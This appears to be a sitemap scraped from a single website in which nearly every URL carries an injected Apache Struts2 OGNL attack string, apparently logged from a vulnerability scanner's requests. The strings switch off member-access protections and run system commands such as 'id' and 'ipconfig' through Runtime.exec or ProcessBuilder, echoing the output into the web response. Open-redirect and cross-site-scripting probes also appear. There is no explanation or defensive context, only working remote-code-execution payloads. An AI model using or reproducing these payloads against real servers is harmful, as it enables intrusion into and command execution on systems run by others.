http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27id%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?=%2578%2573%2573%2574%2565%2573%2574%2535%2561%2532 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?&redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27_002_product.html%3f&test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html%3f=%2578%2573%2573%2574%2565%2573%2574%2535%2561%2532? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('ipconfig').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?redirect:http://www.anonymous.com/ 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?&debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'ipconfig'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?&('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?&class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4(_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'id'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?('%5c43_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5c43context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5c75false')(d))&('%5c43c')(('%5c43_memberaccess.excludeproperties%5c75@java.util.collections@empty_set')(c))&(asdf)(('%5c43rp%5c75@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5c43rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5c43rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5c43rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?method:%23_memberaccess%3d@ognl.ognlcontext@default_member_access,%23context[%23parameters.obj[0]].getwriter().print(%23parameters.content[0]%2b201%2b20702),1?%23xx:%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=visc3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4(_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea'_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4'%5b%5d_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 